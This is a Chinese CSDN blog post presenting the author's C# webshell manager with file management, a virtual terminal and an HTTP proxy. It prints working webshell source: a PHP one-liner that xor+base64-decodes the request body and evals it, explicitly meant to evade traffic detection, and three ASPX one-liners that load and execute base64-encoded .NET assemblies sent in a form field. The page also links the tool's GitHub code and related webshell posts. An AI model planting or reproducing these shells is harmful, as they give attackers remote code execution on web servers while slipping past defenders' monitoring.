C# 个人版webshell管理工具

最新推荐文章于 2024-01-14 18:43:27 发布
最新推荐文章于 2024-01-14 18:43:27 发布
阅读量244 收藏
点赞数 1
文章标签: c# 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18193739/article/details/132255170
版权
文章讨论了使用Aspx和PHP实现的虚拟终端功能,包括文件管理、增删改查和HTTP代理。重点介绍了PHPxor+Base64加密以及如何参考冰蝎和AntSword项目进行流量加密和创建C#的一行payload,以兼容不同内存环境。作者旨在通过编码实践提升编程能力,开源代码可在GitHub上获取。
摘要由CSDN通过智能技术生成

主要功能

  1. 已完成 aspx,php 虚拟终端,文件管理,增删改查,文件上传
  2. HTTP代理
  3. 更新内容:php xor+base64加密,aspx base64加密

php

参考冰蝎实现xor+base64流量加密,更好绕过流量检测

webshell

<?php
function Decrypt($data)
{
   $key="e45e329feb5d925b";
   $bs="base64_"."decode";
 $after=$bs($data."");
 for($i=0;$i<strlen($after);$i++) {
     $after[$i] = $after[$i]^$key[$i+1&15];
  }
   return $after;
}
eval(Decrypt(file_get_contents("php://input")));
?>

aspx

参考AntSword-Csharp-Template 中国蚁剑Csharp一句话Payload

https://github.com/AntSwordProject/AntSword-Csharp-Template

shell.aspx

为了兼容各种情况下的内存马,Equals中的入口参数可以为System.Web.HttpContext对象,或者包含Request与Response对象的数组。

<%@ Page Language="c#"%>
<%
  String Payload = Request.Form["ant"];
  if (Payload != null)
  {
      System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
      assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(Context);
  }
%>

<%@ Page Language="c#"%>
<%
  String Payload = Request.Form["ant"];
  if (Payload != null)
  {
      System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
      assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(new object[] { Request, Response });
  }
%>

<%@ Page Language="c#"%>
<%
  String Payload = Request.Form["ant"];
  if (Payload != null)
  {
      System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
      assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(null);
  }
%>

加密效果

在这里插入图片描述

在这里插入图片描述

代码写的不是很好,主要是用C#造轮子,来锻炼编程能力

开源地址:

https://github.com/wy876/tools

yr678
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
冰蝎加密 WebShell 过杀软
悦分享
08-03 2380
演练中,第一代webshell管理工具“菜刀”的攻击流量特征明显,容易被安全设备检测到,攻击方越来越少使用,加密webshell 正变得越来越流行,由于流量加密,传统的WAF、WebIDS设备难以检测,给威胁监控带来较大挑战。这其中最出名就是“冰蝎”,“冰蝎”是一款动态二进制加密网站管理客户端,演练中给防守方造成很大困扰,本文将对“冰蝎”的加密原理、流量特征、检测方案进行探讨。"冰蝎"客户端基于JAVA,所以可以跨平台使用,最新版本为v3.0 bate,兼容性较之前的版本有较大提升。...
如何在百万行代码中发现隐藏的后门
04-13 2万+
试想一下,如果你的网站被入侵,攻击者留下隐藏的后门,你真的都可以找出来嘛?面对一个大中型的应用系统,数以百万级的代码行,是不可能做到每个文件每段代码进行手工检查的。即使是一款拥有99....
一个ASP.Net下的WebShell实例
10-27
一个ASP.Net下的WebShell,主要完成cmd命令。一般的服务器设置,asp.net用户的权限都比较高。如果asp的webshell无法执行,可能asp.net的可以执行。
aspx webshell C#2.0
01-27
我用ASP.NET with C#2.0写的一个站点管理页面,界面简单,可以当做WebShell使用。
Webshell查杀C#源码
12-02
Webshell查杀C#源码,最新64位系统专版,源码只用于技术交流,秉承分享精神,请勿用于商业用途
WEB Shell (ASP)
08-18
全部明文,没有加密!是本人经过几个晚上整理的,请不要任意传播,只允许学习使用。
python webshell_SharPyShell:用于C# Web应用程序的小型混淆版WebShell
weixin_39714763的博客
12-08 298
原标题:SharPyShell:用于C# Web应用程序的小型混淆版WebShellSharPyShell是一个用于C#Web应用程序的小型混淆版ASP.NET webshell,执行由加密信道接收的命令,并在运行时将它们编译到内存中。 SharPyShell仅支持在.NET Framework >= 2.0上运行的C#Web应用程序。当前不支持VB。使用 python SharPyShel...
ASP.NET CMD WebShell
weixin_34220179的博客
03-20 271
<%@ Page Language="C#" AutoEventWireup="true" %> <%@ Import Namespace="System.Runtime.InteropServices" %> <%@ Import Namespace="System.IO" %> <%@ Import Namespace="System.Dat...
23个常见Webshell网站管理工具
weixin_54787877的博客
03-20 5299
注 文章来源:“潇湘信安”公众号 这篇文章笔者整理了目前所见到过的大部分Webshell网站管理工具,这里只对这些工具做了简单介绍,并没有写具体使用方式,大家如果有兴趣可以自己去看一下使用说明,同时也欢迎大家补充一些类似工具。 目前国内安全人员常用的有:中国菜刀、中国蚁剑、冰蝎、哥斯拉、Metasploit、SharPyShell等,也有一些内部团队开发的类似工具,但是并没有对外公开。 (1) 中国菜刀(Chopper) 中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5499
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
aspx 版webshell
01-16
此文件是一个是一个别人写的webshll,开发环境c#
渗透系列:Webshell的介绍及工具的使用(web安全系列)
最新发布
weixin_54626591的博客
01-14 133
Webshell的介绍及工具的使用(web安全系列)
webshell及木马详解
金色%夕阳的博客
04-24 5700
webshell简介 什么是webshell ,一句话木马是什么样的 <?php @eval($_POST[cmd]);?> 怎么对木马进行免杀(绕过) 异或变形,关键字拼接,加密,编码等方式 文件上传 文件上传有哪些可以利用的点 前端校验 js 禁用js 或者 burp抓包后改名将.jpg改为.php 后端校验MIME类型。 更改Content-Type为Content-Type: image/jpeg 文件后缀黑名单 寻找其他可解析后缀 利用.user.ini .htaccess 利用%
C#操作webservice(经典入门教程及实例)
Diamond、的博客
09-18 6136
Web Service基本概念  Web Service也叫XML Web Service WebService是一种可以接收从Internet或者Intranet上的其它系统中传递过来的请求,轻量级的独立的通讯技术。是:通过SOAP在Web上提供的软件(服务),使用WSDL文件进行(说明),并通过(UDDI)进行注册。  XML:(Extensible Markup Language)扩展型
Aspxspy中提取执行cmd命令的代码
weixin_34166472的博客
01-06 873
<%@PageLanguage="C#"Debug="true"Trace="false"%> <%@ImportNamespace="System.Diagnostics"%> <scriptLanguage="c#"runat="server"> protectedvoidFbhN(objectsender,E...
最新webshell大合集
热门推荐
帮助别人等于帮助自己 ——MXi4oyu
09-01 3万+
收集与整理了各种webshell,以便在日后的项目中做Webshell检测训练。 https://github.com/tennc/webshell   各种webshell集合 https://github.com/ysrc/webshell-sample webshell样本 https://github.com/xl7dev/WebShell Webshe
从aspx到webshell肉鸡
05-15 6445
笔者一直都在强调一个东西,在网络攻防中最重要的就是思维。本文的灵感来自于安天365团队的一个篇稿件,在稿件中提到了一个AspxSpy的Asp.net类型后门软件,在安全界中最近一直流行后门中的后门,即通过给出一个包含后门的Webshell程序,众多小黑们在外面吭哧吭哧的干活,而给出后门的老板,却在后面偷着数Webshell,这种后门中的后门一般来说有二种类型,一种就是直接挂马,带来直接的收益;另外
ASP.NET木马及Webshell安全解决方案
xlh日记本
02-24 2715
 ASP.NET木马及Webshell安全解决方案Security Fuard Solution Of ASP.NET and Webshell文章简介:本文将为大家介绍在Microsoft Win系列的2003 SERVER IIS6.0中如何简单快速解决ASP.NET中的危险漏洞与隐患对WEB服务器系统的安全威胁之详细防范设置步骤;读完本文,您将可以使您的网站服务器免去ASP.NET木马、
(转)Web安全之如何获取一个WebShell
selecthch的博客
06-22 3747
SQL注入获取Webshell** ** 条件: 1.当前连接Mysql数据库的账户 具有FIle权限 2. 知道网站的绝对路径 利用php报错信息 Google搜索报错信息 load_file()读取配置文件信息 3. MySQL有权...
webshell管理工具
08-25
常用的webshell管理工具有Metasploit、QuasiBot和Webshell-Sniper。 Metasploit虽然不是专门的webshell管理工具,但它具备了一些必要的功能,如文件管理和命令执行,并且支持多种脚本类型,如ASPX、PHP和JSP。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yr678

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值